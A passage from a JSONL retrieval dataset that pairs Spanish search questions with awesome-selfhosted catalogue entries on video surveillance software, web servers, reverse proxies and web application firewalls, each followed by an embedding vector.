0.01242, 0.05828, -0.0442, -0.01282, -0.01188, 0.03736, 0.02286, -0.03975, 0.04413, 0.01319, -0.04778, 0.05033, 0.04761, 0.02311, 0.03794, 0.06962, 0.0289, -0.01282, 0.01958, 0.0094, -0.05117, -0.05903, 0.00335, 0.01512, 0.06514, -0.03244, -0.04068, 0.06222, -0.01712, -0.00476, 0.09506, -0.00474, -0.04604, -0.04428, 0.08386, -0.02744, -0.07089, -0.09662, -0.07259, -0.0301, -0.03232, -0.01268, -0.06157, -0.02163, -0.00544, 0.03532, -0.07148, -0.02194, 0.05196, -0.00915, -0.01259, -0.06084, -0.03425, -0.03031, 0.01459, 0.01094, -0.08003, 0.01882, 0.0413, -0.02509, -0.07079, 0.03365, 0.00318]} {"tipo": "pregunta", "herramienta": "Video Surveillance", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Video Surveillance", "tema": "video surveillance", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Video Surveillance: Zoneminder β€” Closed-circuit television (CCTV) software application which supports IP, USB and Analog cameras [GPL-2.0, PHP/deb].", "indexar": "cual es una alternativa libre a los sistemas de CCTV comerciales?", "v": [-0.01827, 0.02378, -0.07587, -0.08722, -0.14382, -0.20046, -0.00462, 0.00474, -0.14207, -0.0089, -0.02045, -0.15305, -0.07249, 0.0137, 0.10754, -0.00936, 0.03522, -0.20818, 0.15809, -0.07663, -0.02701, -0.11973, -0.04182, -0.03408, -0.05375, 0.05249, -0.03537, -0.12103, -0.10828, 0.11151, 0.07655, -0.01176, 0.08499, 0.04989, -0.01836, -0.03275, 0.05215, -0.03765, 0.03054, -0.0561, 0.13665, -0.15617, -0.07558, -0.03379, 0.13863, -0.03957, -0.02234, -0.05984, -0.03097, -0.1015, -0.10517, -0.02558, -0.12706, -0.02543, 0.16906, -0.03804, -0.03616, 0.06374, -0.00709, -0.11411, 0.0724, 0.11162, 0.0406, -0.08431, 0.01754, 0.04422, -0.08898, -0.00924, -0.05605, 0.03673, -0.01266, -0.04442, -0.0347, 0.00515, 0.01908, 0.03265, -0.03435, 0.01127, 0.02569, 0.00057, 0.02846, -0.04415, -0.01445, 0.09628, -0.00331, -0.07762, 0.03565, -0.0207, -0.05482, 0.00148, 0.07284, 0.05707, -0.05172, 0.10775, 0.11371, -0.06755, -0.03171, 0.07429, -0.03033, 0.11605, 0.03579, 0.0305, -0.14517, -0.00644, -0.0621, -0.02729, -0.00877, -0.03461, -0.02577, -0.05369, -0.02856, 0.07131, 0.03915, -0.03152, -0.042, -0.01507, -0.01901, 0.0178, -0.06009, 0.07271, -0.06183, -0.00864, -0.01855, -0.03536, 0.03884, 0.03027, 0.05136, 0.06804, -0.0483, 0.04164, 0.03517, -0.01023, -0.06937, -0.06273, -0.03915, 0.01394, 0.04484, -0.03381, -0.03699, 0.02275, -0.01694, -0.0022, 0.00584, -0.02596, 0.10089, 0.01423, 0.00689, -0.10633, -0.01374, 0.0026, -0.04697, 0.06582, -0.08563, 0.04358, 0.02551, 0.04756, 0.02913, -0.06608, -0.00804, 0.08761, 0.03676, 0.00452, 4e-05, 0.03135, -0.02364, -0.02987, -0.07184, -0.02234, -0.01589, 0.03845, 0.00211, 0.08321, 0.07624, -0.08239, 0.05774, -0.05073, -0.02875, -0.10887, 0.04462, -0.03691, -0.07471, 0.0284, -0.0553, -0.00985, -0.01443, -0.06443, -0.05256, 0.00546, 0.02563, 0.01657, -0.01526, 0.07189, -0.13408, -0.08108, -0.06681, -0.047, -0.05247, -0.07691, -0.04406, 0.02945, -0.12643, -0.00085, 0.07869, -0.03388, -0.03609, 0.0287, 0.03518, 0.08907, 0.03575, 0.053, 0.00641, -0.02366, 0.03516, -0.06738, -0.09032, 0.00539, 0.0348, 0.01043, -0.01561, -0.06506, 0.07223, 0.03182, 0.04539, -0.00997, -0.03276, -0.00414, 0.02693, 0.11109, -0.02566, -0.0315, -0.05202, -0.0081, 0.04481, 0.00252, 0.04595, 0.00417, 0.01221, -0.02564, 2e-05, -0.03934, 0.09221, 0.08348, -0.04229, -0.03664, -0.014, -0.01541, -0.12078, 0.01702, -0.02826, -0.09821, -0.05424, 0.02459, -0.0061, 0.00154, 0.03792, -0.01464]} -{"tipo": "pregunta", "herramienta": "Web Servers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Web Servers", "tema": "web servers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Web Servers: Algernon β€” Small self-contained pure-Go web server with Lua, Markdown, HTTP/2, QUIC, Redis and PostgreSQL support [BSD-3-Clause, Go/Docker]. Apache HTTP Server β€” Secure, efficient and extensible server that provides HTTP services in sync with the current HTTP standards [Apache-2.0, C/deb/Docker]. BunkerWeb β€” Next-gen Web Application Firewall (WAF) that will protect your web services [AGPL-3.0, deb/Docker/K8S/Python]. Caddy β€” Powerful, enterprise-ready, open source web server with automatic HTTPS [Apache-2.0, Go/deb/Docker]. Ferron β€” Fast, memory-safe web server written in Rust [MIT, Rust/Docker/deb]. go-doxy β€” Lightweight, simple, and performant reverse proxy with WebUI, Docker integration, automatic shutdown/startup for container based on traffic [MIT, Docker/Go]. godoxy β€” High-performance reverse proxy and container orchestrator for self-hosters [MIT, Docker/Go]. HAProxy β€” Very fast and reliable reverse-proxy offering high availability, load balancing, and proxying for TCP and HTTP-based applications [GPL-2.0, C/deb/Docker].", "indexar": "quΓ© servidor web ligero y autocontenido en Go me sirve para alojar sitios pequeΓ±os?", "v": [-0.08462, 0.04462, -0.13997, 0.06699, -0.06449, -0.14174, 0.02009, -0.10708, -0.07849, -0.0364, -0.08757, -0.10105, -0.01623, -0.03975, 0.25816, -0.00898, 0.19871, -0.09098, 0.07168, 0.02242, -0.02137, 0.08428, 0.10339, -0.01666, -0.03483, -0.00519, 0.17989, -0.1088, -0.11518, 0.10814, -0.00327, -0.03188, 0.06837, -0.0151, -0.09471, -0.06781, 0.11162, 0.13036, -0.12005, 0.07473, 0.06559, -0.01212, -0.04241, -0.00771, -0.03233, -0.03915, 0.01761, -0.0894, 0.03754, 0.0048, -0.02817, -0.04721, -0.05241, -0.06059, -0.02122, 0.13793, 0.12313, -0.10004, 0.11519, 0.02029, -0.16384, -0.00975, 0.01287, -0.01511, 0.02215, -0.01187, -0.01246, 0.07891, -0.07039, -0.06448, -0.0642, 0.03267, 0.16183, -0.03478, 0.10317, 0.00994, -0.0204, 0.03918, 0.06595, 0.07194, 0.0435, 0.07435, -0.05827, 0.04609, -0.07665, 0.02361, -0.06166, -0.03777, 0.10545, 0.013, 0.05696, 0.07739, -0.00443, -0.02049, -0.09767, -0.06169, 0.07889, -0.03663, 0.04712, -0.00788, 0.06766, 0.00398, -0.1045, 0.01797, 0.03996, 0.08949, 0.0629, -0.05659, -0.03669, -0.03835, 0.10684, -0.0014, -0.05202, -0.05484, 0.00597, 0.03026, 0.07482, 0.00479, 0.02092, -0.02985, -0.11239, 0.03795, -0.0195, 0.07782, -0.08443, 0.04447, 0.03695, 0.04933, -0.03409, -0.08579, 0.01724, -0.08827, -0.11184, -0.00547, 0.02071, 0.11776, 0.10644, 0.04698, -0.00868, 0.02745, 0.04855, 0.01234, -0.06741, 0.01668, 0.05096, 0.01138, 0.06633, -0.03368, -0.02703, 0.04764, -0.02933, -0.08745, -0.05691, -0.05718, -0.0787, -0.0166, -0.02475, -0.05556, -0.01805, -0.0093, 0.01667, -0.00624, 0.06676, 0.06082, -0.01425, -0.00128, -0.09727, 0.03879, 0.06915, 0.04612, -0.03416, 0.03197, -0.05167, -0.06025, 0.00707, 0.01796, -0.08498, 0.00727, -0.02361, -0.02235, -0.00664, -0.02229, -0.05524, 0.09557, -0.05531, 0.0011, 0.01432, -0.09203, 0.00041, -0.04798, -0.00681, 0.01637, -0.00996, -0.00243, 0.08321, 0.00621, 0.01925, -0.05965, 0.04037, 0.02436, -0.0173, -0.07084, -0.05077, -0.02086, -0.03994, 0.01038, -0.0086, 0.01803, -0.00156, 0.07245, -0.02974, 0.00063, 0.03858, -0.09225, 0.00528, -0.0285, 0.05474, -0.03615, -0.06061, 0.0117, 0.04122, -0.03667, 0.00368, 0.0064, 0.01086, 0.04747, 0.05359, -0.08103, 0.0655, 0.00873, -0.03137, -0.03513, -0.0656, -0.04402, 0.00576, -0.06721, -0.05489, 0.00809, -0.05769, -0.03054, 0.00031, 0.04018, 0.03519, -0.03217, 0.03046, -0.0141, -0.01234, -0.04054, 0.01394, 0.02792, -0.06385, -0.05939, -0.00057, -0.00731, 0.01686, 0.0354]} -{"tipo": "pregunta", "herramienta": "Web Servers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Web Servers", "tema": "web servers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Web Servers: Algernon β€” Small self-contained pure-Go web server with Lua, Markdown, HTTP/2, QUIC, Redis and PostgreSQL support [BSD-3-Clause, Go/Docker]. Apache HTTP Server β€” Secure, efficient and extensible server that provides HTTP services in sync with the current HTTP standards [Apache-2.0, C/deb/Docker]. BunkerWeb β€” Next-gen Web Application Firewall (WAF) that will protect your web services [AGPL-3.0, deb/Docker/K8S/Python]. Caddy β€” Powerful, enterprise-ready, open source web server with automatic HTTPS [Apache-2.0, Go/deb/Docker]. Ferron β€” Fast, memory-safe web server written in Rust [MIT, Rust/Docker/deb]. go-doxy β€” Lightweight, simple, and performant reverse proxy with WebUI, Docker integration, automatic shutdown/startup for container based on traffic [MIT, Docker/Go]. godoxy β€” High-performance reverse proxy and container orchestrator for self-hosters [MIT, Docker/Go]. HAProxy β€” Very fast and reliable reverse-proxy offering high availability, load balancing, and proxying for TCP and HTTP-based applications [GPL-2.0, C/deb/Docker].", "indexar": "cΓ³mo protejo mejor mis servicios web con un firewall de prΓ³xima generaciΓ³n?", "v": [-0.05269, -0.029, -0.16412, -0.17588, -0.03786, -0.06079, -0.00022, -0.04342, -0.06617, -0.14485, -0.04938, 0.03001, -0.0673, -0.02555, 0.06054, -0.01422, -0.03594, -0.02528, 0.01886, 0.02148, -0.11548, 0.03391, -0.01627, -0.20391, 0.01133, -0.06031, 0.09718, 0.01529, -0.10478, 0.05431, 0.08735, -0.04197, 0.07653, -0.04148, -0.03125, 0.08407, -0.00291, 0.23605, 0.02983, -0.00656, -0.08572, -0.09154, 0.00367, 0.00895, 0.05841, 0.0114, -0.09622, -0.10254, 0.06958, 0.03167, -0.05787, -0.09227, -0.01608, 0.02083, 0.02186, 0.01002, 0.06905, -0.09642, -0.02651, -0.11216, -0.11256, 0.04115, 0.02172, 0.00378, 0.00117, -0.11414, -0.09131, -0.06624, -0.05049, 0.00474, -0.02726, -0.04703, 0.01481, -0.08083, 0.00037, 0.02132, 0.00375, 0.02181, 0.0518, 0.05237, 0.02775, 0.02243, -0.03588, 0.02668, -0.12588, -0.03708, -0.09666, -0.07826, -0.02659, -0.15112, 0.14513, 0.04792, -0.10433, -0.05239, 0.00092, -0.01279, 0.11208, 0.01182, -0.05512, -0.03305, -0.04795, 0.02204, -0.08134, 0.1461, 0.09527, 0.01149, -0.00844, -0.04166, -0.0574, -0.06271, -0.00171, -0.02536, -0.01611, -0.11922, -0.03393, -0.03052, -0.06774, -0.03721, 0.12228, -0.05902, 0.06597, -0.03572, -0.08398, -0.0174, 0.00522, 0.11467, -0.01086, 0.05249, -0.07401, -0.04112, -0.06725, -0.13459, -0.07884, -0.09864, -0.02087, -0.01979, -0.06398, -0.03972, -0.05674, -0.0271, 0.1256, -0.00392, -0.03008, 0.02844, -0.03866, -0.03174, 0.00647, -0.06532, -0.0853, 0.01445, -0.03475, 0.02809, -0.06641, 0.0331, -0.09458, 0.04353, -0.07596, -0.10864, 0.07667, 0.10582, 0.08985, -0.06371, 0.02, 0.07862, -0.00024, 0.08632, -0.06176, 0.01922, 0.05175, -0.00275, -0.03842, 0.02393, -0.03054, -0.13311, -0.04623, 0.00838, -0.04642, 0.04838, 0.10777, 0.01064, -0.02278, -0.02219, -0.08074, 0.00431, -0.05062, -0.03432, -0.00191, -0.02511, -0.00747, 0.0939, 0.09691, -0.00809, 0.0102, 0.08387, 0.00345, -0.07993, -0.08295, -0.04784, 0.02081, 0.02629, -0.055, -0.04548, -0.01497, -0.04468, -0.03523, 0.05359, -0.01688, -0.08294, 0.03015, 0.04644, 0.05827, 0.01581, 0.06754, -0.02866, -0.01697, 0.00686, 0.05213, -0.01968, 0.01019, 0.04099, 0.02073, 0.05089, -0.0396, -0.02884, -0.03374, -0.02951, -0.03074, 0.02048, 0.04462, -0.02335, -0.01927, -0.01202, -0.02528, 0.01668, 0.04324, -0.02692, -0.03825, -0.05683, -0.03244, -0.07095, -0.01471, -0.02576, -0.01572, -0.00408, 0.01375, -0.05532, -0.08802, 0.01447, 0.01482, -0.05325, -0.02011, -0.03228, -0.01746, 0.01505, 0.0305, 0.01369]} -{"tipo": "pregunta", "herramienta": "Web Servers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Web Servers", "tema": "web servers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Web Servers: Algernon β€” Small self-contained pure-Go web server with Lua, Markdown, HTTP/2, QUIC, Redis and PostgreSQL support [BSD-3-Clause, Go/Docker]. Apache HTTP Server β€” Secure, efficient and extensible server that provides HTTP services in sync with the current HTTP standards [Apache-2.0, C/deb/Docker]. BunkerWeb β€” Next-gen Web Application Firewall (WAF) that will protect your web services [AGPL-3.0, deb/Docker/K8S/Python]. Caddy β€” Powerful, enterprise-ready, open source web server with automatic HTTPS [Apache-2.0, Go/deb/Docker]. Ferron β€” Fast, memory-safe web server written in Rust [MIT, Rust/Docker/deb]. go-doxy β€” Lightweight, simple, and performant reverse proxy with WebUI, Docker integration, automatic shutdown/startup for container based on traffic [MIT, Docker/Go]. godoxy β€” High-performance reverse proxy and container orchestrator for self-hosters [MIT, Docker/Go]. HAProxy β€” Very fast and reliable reverse-proxy offering high availability, load balancing, and proxying for TCP and HTTP-based applications [GPL-2.0, C/deb/Docker].", "indexar": "cuΓ‘l es la alternativa mΓ‘s rΓ‘pida a Apache HTTP Server escrita en Rust?", "v": [-0.09161, 0.04381, -0.03161, -0.04789, -0.04327, -0.0918, -0.02055, -0.14959, 0.06371, 0.12382, -0.17284, -0.11136, -0.00204, 0.04945, 0.18078, -0.06735, -0.00944, 0.03328, 0.08345, -0.02106, -0.02697, -0.10404, -0.05259, 0.03817, -0.10975, -0.12822, 0.05758, 0.14254, -0.11865, -0.08761, 0.0902, -0.00548, -0.04029, 0.15216, -0.09013, 0.00517, 0.08531, 0.05857, -0.00318, 0.10314, 0.01104, 0.02178, -0.0231, 0.07645, -0.05597, 0.01599, -0.02606, -0.03349, 0.04575, -0.03103, -0.08676, 0.00504, -0.16901, 0.07961, -0.07391, 0.12582, 0.12075, -0.14138, 0.03529, -0.17703, -0.04564, 0.01587, -0.05445, -0.06275, 0.04699, -0.03412, -0.12861, -0.0336, -0.11999, 0.06694, -0.03123, 0.01768, 0.00843, -0.07483, 0.06432, 0.0682, -0.07072, 0.04599, -0.02004, 0.08948, 0.10235, -0.04371, 0.01156, 0.03362, -0.04196, -0.08526, -0.05009, -0.16399, 0.03822, 0.00533, 0.13541, 0.06159, -0.01685, 0.07758, -0.04822, -0.11529, 0.05143, -0.08265, 0.01734, -0.04763, -0.04624, 0.08906, -0.08379, 0.06191, 0.09412, 0.0334, -0.0161, 0.04303, -0.04463, -0.06888, 0.05537, 0.06108, -0.08717, 0.04554, -0.00606, -0.02413, 0.06925, 0.00569, -0.03097, -0.01968, -0.07828, -0.06058, -0.0787, -0.00973, 0.02732, 0.06588, 0.00708, 0.03015, -0.03624, -0.01636, 2e-05, -0.09258, -0.0771, -0.05077, -0.12396, 0.0315, 0.04585, -0.00098, 0.02632, 0.0458, -0.01005, -0.0526, -0.02732, -0.00608, 0.04577, 0.00324, 0.07617, -0.07522, 0.00059, 0.01694, -0.03961, 0.026, -0.04585, 0.0207, -0.12811, -0.08895, 0.0005, -0.10427, -0.11481, 0.11499, 0.05767, -0.03321, 0.02571, 0.0482, -0.04044, 0.077, -0.10606, 0.01315, 0.02557, -0.02535, 0.0277, 0.04783, -0.03286, -0.06689, -0.04593, -0.06692, -0.03031, -0.02046, -0.00741, 0.01199, -0.01261, -0.0506, -0.05498, 0.04843, 0.0353, -0.00891, 0.0678, 0.01573, -0.01332, 0.02, -0.02583, 0.00878, -0.07792, -0.01138, -0.00408, -0.0397, -0.03517, -0.06416, 0.00714, -0.03546, -0.05311, -0.0839, -0.01594, -0.01449, 0.01542, 0.00399, -0.01156, -0.01153, -0.05212, -0.01783, 0.01654, -0.01113, 0.08332, -0.01258, 0.02693, 0.04898, 0.03666, -0.04198, 0.01221, -0.01437, -1e-05, -0.02131, -0.02537, -0.01688, 0.03881, -0.00159, 0.08743, -6e-05, 0.01095, -0.00017, -0.01491, -0.02546, -0.02372, 0.03445, 0.0032, -0.00307, -0.01999, -0.0261, -0.01558, -0.02566, 0.05297, 0.02501, -0.0372, -0.0134, -0.00823, 0.01171, -0.09971, -0.00549, -0.04813, 0.02443, -0.07698, -0.03663, 0.01523, -0.03673, 0.02788, 0.02628]} -{"tipo": "pregunta", "herramienta": "Web Servers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Web Servers", "tema": "web servers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Web Servers: Lighttpd β€” Secure, fast, compliant, and very flexible web server that has been optimized for high-performance environments [BSD-3-Clause, C/deb/Docker]. Nginx Proxy Manager β€” Docker container for managing Nginx proxy hosts with a simple, powerful interface [MIT, Docker]. NGINX β€” HTTP and reverse proxy server, mail proxy server, and generic TCP/UDP proxy server [BSD-2-Clause, C/deb/Docker]. Pangolin β€” Identity-aware tunneled reverse proxy with dashboard UI, access control, and WireGuard-based tunnels (alternative to Cloudflare Tunnel, Tailscale) [AGPL-3.0, Docker]. Pomerium β€” Identity-aware reverse proxy, successor to now obsolete oauth_proxy. It inserts an OAuth step before proxying your request to the backend, so that you can safely expose your self-hosted websites to public Internet [Apache-2.0, Go/Docker]. SafeLine β€” Web application firewall / reverse proxy to protect your web apps from attacks and exploits [GPL-3.0, Docker].", "indexar": "que programa puedo usar como servidor web seguro y rΓ‘pido en mi entorno autoalojado?", "v": [-0.03062, 0.03902, -0.24663, -0.17222, -0.1099, -0.07825, -0.03037, -0.10819, -0.10264, -0.08608, -0.13039, -0.12832, 0.03709, -0.0084, 0.027, -0.008, 0.19547, -0.14344, 0.0187, 0.06303, 0.08608, -0.01441, -0.04388, -0.05099, -0.02878, 0.05219, 0.14574, -0.04013, -0.10754, 0.01678, 0.00622, 0.08523, 0.17736, -0.0052, -0.02723, -0.05065, 0.05205, 0.15184, 0.03883, 0.05387, 0.06289, -0.04015, -0.04107, -0.00533, 0.10821, 0.08526, 0.0431, -0.1191, -0.01018, -0.06378, -0.02462, -0.07855, -0.10246, -0.07588, -0.0064, 0.01514, 0.14271, -0.16542, 0.02183, -0.04324, -0.12791, 0.03126, -0.02324, 0.01198, 0.00563, -0.07948, 0.0638, 0.02828, -0.09624, -0.07807, -0.05584, -0.10422, 0.12474, -0.013, 0.03629, 0.00177, -0.08913, 0.00751, 0.05638, 0.08875, -0.01009, 0.0828, 0.03595, 0.09303, -0.1522, -0.03345, 0.01977, -0.03746, 0.06339, 0.03871, 0.02656, 0.05394, -0.02875, 0.0897, -0.05038, -0.09079, 0.11816, -0.02162, 0.03124, -0.01396, 0.09012, -0.04936, -0.02545, 0.06654, 0.0192, 0.05119, 0.1109, 0.01173, 0.00099, -0.04761, 0.02505, -0.00757, -0.09247, -0.08625, -0.00893, 0.04373, 0.03135, 0.04456, 0.04965, -0.08698, -0.07158, 0.0548, 0.00101, -0.01189, 0.0446, -0.00422, 0.03271, 0.07021, -0.06443, 0.0048, -0.03693, -0.05093, -0.09672, -0.07552, -0.01125, 0.01032, -0.00671, -0.05637, -0.00013, 0.00336, 0.05691, 0.032, -0.04649, 0.00549, 0.08227, -0.00129, 0.00716, -0.05172, -0.05141, 0.06829, -0.03521, -0.03483, -0.0492, -0.00719, -0.11752, -0.07842, 0.0447, -0.04223, -0.00128, 0.00671, -0.00472, 0.03977, 0.10555, 0.05277, 0.07022, -0.02306, 0.04327, 0.00351, 0.03867, 0.05542, 0.01117, 0.09436, 0.02395, -0.07996, 0.03498, -0.00982, -0.04692, -0.04525, -0.01879, 0.01269, -0.08097, 0.01859, -0.01013, 0.03627, -0.06305, -0.01744, 0.00222, 0.05158, -0.04021, -0.01359, -0.02519, 0.03867, 0.00782, 0.05166, 0.03574, -0.00221, -0.03935, -0.01123, -0.00105, -0.04771, -0.0481, -0.07934, -0.03527, -0.03928, 0.01699, 0.03961, -0.022, 0.04816, 0.0186, 0.08845, -0.00553, -0.01054, 0.13084, 0.02402, -0.01199, 0.00164, 0.04244, 0.01669, -0.0011, -0.02219, 0.02859, -0.01273, -0.01006, 0.04622, 0.00135, -0.03451, -0.00059, -0.02894, 0.04128, -0.02583, -0.01302, -0.03502, -0.06904, -0.03557, 0.0071, 0.01355, -0.01943, -0.06289, -0.04706, -0.04989, -0.00245, 0.07539, 0.01494, -0.08254, -0.02244, -0.02555, -0.03575, 0.00835, -0.04622, -0.0371, -0.03413, -0.05123, 0.02036, -0.03426, 0.00716, 0.07111]} -{"tipo": "pregunta", "herramienta": "Web Servers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Web Servers", "tema": "web servers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Web Servers: Lighttpd β€” Secure, fast, compliant, and very flexible web server that has been optimized for high-performance environments [BSD-3-Clause, C/deb/Docker]. Nginx Proxy Manager β€” Docker container for managing Nginx proxy hosts with a simple, powerful interface [MIT, Docker]. NGINX β€” HTTP and reverse proxy server, mail proxy server, and generic TCP/UDP proxy server [BSD-2-Clause, C/deb/Docker]. Pangolin β€” Identity-aware tunneled reverse proxy with dashboard UI, access control, and WireGuard-based tunnels (alternative to Cloudflare Tunnel, Tailscale) [AGPL-3.0, Docker]. Pomerium β€” Identity-aware reverse proxy, successor to now obsolete oauth_proxy. It inserts an OAuth step before proxying your request to the backend, so that you can safely expose your self-hosted websites to public Internet [Apache-2.0, Go/Docker]. SafeLine β€” Web application firewall / reverse proxy to protect your web apps from attacks and exploits [GPL-3.0, Docker].", "indexar": "cual es una alternativa de tΓΊnel inverso con control de acceso para exponer mis sitios a internet de forma segura?", "v": [0.11982, 0.01573, -0.19356, 0.00075, 0.09033, -0.02441, -0.08777, -0.07764, -0.10086, 0.0637, -0.06962, -0.05543, 0.04029, 0.10399, 0.07853, -0.00467, 0.07496, -0.11792, 0.1776, -0.01168, -0.09005, -0.06414, 0.00317, -0.03934, -0.00178, -0.06104, -0.1371, -0.01688, -0.04649, -0.07316, -0.04515, -0.0114, 0.10069, 0.04625, -0.08561, -0.03294, 0.04307, 0.16741, 0.0616, -0.01371, 0.04016, -0.04541, -0.10364, 0.07198, -0.01237, -0.00866, -0.12029, -0.06479, 0.05673, -0.08237, -0.08805, -0.03407, -0.17944, -0.07375, 0.0751, -0.08051, 0.13979, -0.05661, 0.10494, -0.0732, -0.00418, -0.00571, -0.06201, 0.14888, 0.02742, 0.02226, -0.0629, 0.00173, -0.13508, -0.02437, 0.00298, -0.01199, 0.02177, 0.02107, -0.00103, -0.03173, -0.03877, 0.08079, 0.04498, 0.02914, -0.10345, -0.03309, -0.03254, 0.05146, -0.11868, -0.06885, -0.08283, -0.1205, -0.08986, -0.03494, 0.008, 0.04893, 0.02291, 0.06094, -0.03968, -0.11704, -0.03417, 0.05588, -0.04923, -0.03054, 0.04557, 0.07053, -0.08885, 0.18311, 0.0308, 0.04276, 0.01527, -0.03829, -0.04771, -0.04036, 0.01099, 0.0732, 0.01917, -0.05265, 0.02683, -0.066, 0.02472, 0.0338, 0.01828, -0.10454, -0.06448, -0.03171, -0.00198, -0.01851, 0.0528, 0.00887, 0.00584, 0.05326, 0.02757, -0.02564, -0.01817, -0.01337, -0.01847, -0.08107, -0.04501, 0.01149, 0.02799, -0.0131, 0.07464, 0.00369, 0.07327, -0.03231, 0.00162, -0.10816, 0.02771, -0.05782, 0.00816, -0.0887, -0.11271, -0.01246, -0.13434, 0.08208, 0.00667, 0.01235, 0.00814, 0.00112, -0.10583, -0.04479, -0.05333, 0.14101, 0.01038, 0.03047, 0.07838, -0.02848, -0.04354, -0.00866, -0.09737, 0.00425, -0.00888, -0.06028, -0.06613, 0.07368, -0.01392, -0.02516, 0.00914, -0.04301, -0.06955, -0.05018, 0.06854, -0.05678, 0.00656, -0.08604, -0.08628, 0.0711, -0.03587, -0.02467, 0.0561, -0.03602, 0.02015, 0.06071, -0.00497, -0.03406, -0.0444, 0.01074, -0.02116, 0.0091, 0.02075, -0.04875, 0.10455, -0.02575, -0.04859, -0.06033, 0.03746, -0.0532, -0.06157, 0.02927, -0.03218, -0.04237, -0.02523, 0.06907, 0.08212, -0.06038, 0.03143, -0.02068, -0.04224, -0.02353, 0.0853, -0.01386, -0.0787, 0.0235, 0.02713, -0.0132, -0.00868, 0.05278, -0.01063, -0.01199, 0.05901, 0.02227, -0.04434, 0.01518, -0.02042, -0.00688, -0.06188, -0.03792, 0.05563, -0.00087, -0.03347, -0.02793, -0.02104, -0.0707, 0.02747, 0.08665, 0.03694, -0.00642, -0.00861, -0.0426, -0.12452, 0.02584, -0.02696, -0.01627, -0.03095, 0.01576, 0.03162, 0.0112, 0.0442, -0.04294]} -{"tipo": "pregunta", "herramienta": "Web Servers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Web Servers", "tema": "web servers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Web Servers: Lighttpd β€” Secure, fast, compliant, and very flexible web server that has been optimized for high-performance environments [BSD-3-Clause, C/deb/Docker]. Nginx Proxy Manager β€” Docker container for managing Nginx proxy hosts with a simple, powerful interface [MIT, Docker]. NGINX β€” HTTP and reverse proxy server, mail proxy server, and generic TCP/UDP proxy server [BSD-2-Clause, C/deb/Docker]. Pangolin β€” Identity-aware tunneled reverse proxy with dashboard UI, access control, and WireGuard-based tunnels (alternative to Cloudflare Tunnel, Tailscale) [AGPL-3.0, Docker]. Pomerium β€” Identity-aware reverse proxy, successor to now obsolete oauth_proxy. It inserts an OAuth step before proxying your request to the backend, so that you can safely expose your self-hosted websites to public Internet [Apache-2.0, Go/Docker]. SafeLine β€” Web application firewall / reverse proxy to protect your web apps from attacks and exploits [GPL-3.0, Docker].", "indexar": "quΓ© herramienta me sirve para proteger mis aplicaciones web contra ataques y exploits?", "v": [-0.05704, 0.08357, -0.16145, -0.22266, 0.01378, -0.04618, -0.04614, 0.07564, -0.01263, 0.03785, -0.03156, -0.05375, -0.02485, 0.01209, 0.03959, -0.03694, 0.06699, -0.10456, 0.09382, -0.00267, -0.02254, 0.02799, -0.05502, -0.0856, -0.12683, 0.05745, 0.0336, 0.03063, -0.13742, -0.01906, -0.06512, 0.04002, 0.06433, -0.02196, -0.08064, 0.01394, -0.06706, -0.01166, 0.06497, 0.10415, 0.01989, -0.09972, -0.15921, -0.02662, 0.05564, 0.0172, -0.04059, -0.03619, -0.01069, 0.06627, -0.02348, -0.11839, -0.17422, -0.01944, -0.01701, -0.10958, 0.05832, -0.11753, 0.06787, -0.03737, -0.1799, 0.05351, 0.01495, -0.04827, 0.0956, -0.15391, -0.04243, 0.02324, -0.11605, 0.10984, -0.00965, 0.05131, 0.07506, 0.04906, 0.02016, -0.03584, 0.01717, 0.05914, 0.00754, 0.0107, -0.04139, 0.04031, -0.13381, 0.02753, -0.0856, -0.06799, 0.04318, -0.0065, -0.02817, -0.11538, 0.05024, 0.0569, -0.10199, -0.07918, -0.02901, -0.07441, 0.07896, -0.05339, 0.03374, 0.02828, 0.04527, -0.12592, -0.08133, -0.02535, -0.01107, 0.00349, -0.06367, -0.03032, -0.05877, -0.09201, -0.04938, -0.07168, -0.0069, 0.00986, 0.04298, 0.03664, -0.03746, -0.08833, 0.07722, -0.07562, -0.06943, -0.03937, -0.06225, 0.04364, 0.06498, 0.05091, -0.02887, 0.07308, -0.08013, -0.10894, -0.03144, -0.10955, -0.02478, 0.03328, -0.03178, -0.01622, -0.01553, -0.16318, -0.01401, -0.00423, 0.08074, 0.11286, -0.04813, 0.00877, 0.00861, 0.05052, 0.03824, 0.00027, -0.01112, -0.02863, 0.01972, -0.11903, -0.06207, 0.04276, -0.08882, 0.00597, -0.05771, -0.07116, -0.04686, 0.07344, -0.03647, -0.03546, 0.01229, 0.04284, -0.02247, -0.04239, 0.05187, 0.00779, 0.10857, 0.07105, 0.06506, 0.09642, 0.10821, -0.09828, 0.01743, -0.08192, -0.02948, 0.02674, 0.03535, -0.09998, -0.05306, -0.06694, 0.00106, 0.05216, -0.00329, -0.04001, 0.06345, -0.00529, 0.02801, 0.05622, 0.01629, 0.03545, 0.02221, 0.00863, 0.01659, -0.00831, -0.05296, -0.06357, 0.00867, -0.01772, -0.01253, -0.07274, -0.05459, -0.00773, 0.05739, 0.09315, 0.01266, -0.04289, -0.04113, 0.05232, 0.03427, 0.04036, 0.05549, 0.00438, -0.06268, -0.06166, 0.06437, 0.08264, -0.04236, -0.02709, 0.03259, 2e-05, -0.02638, -0.00644, -0.02935, 0.01971, -0.05022, -0.06533, -0.02105, -0.01997, 0.00532, -0.08302, 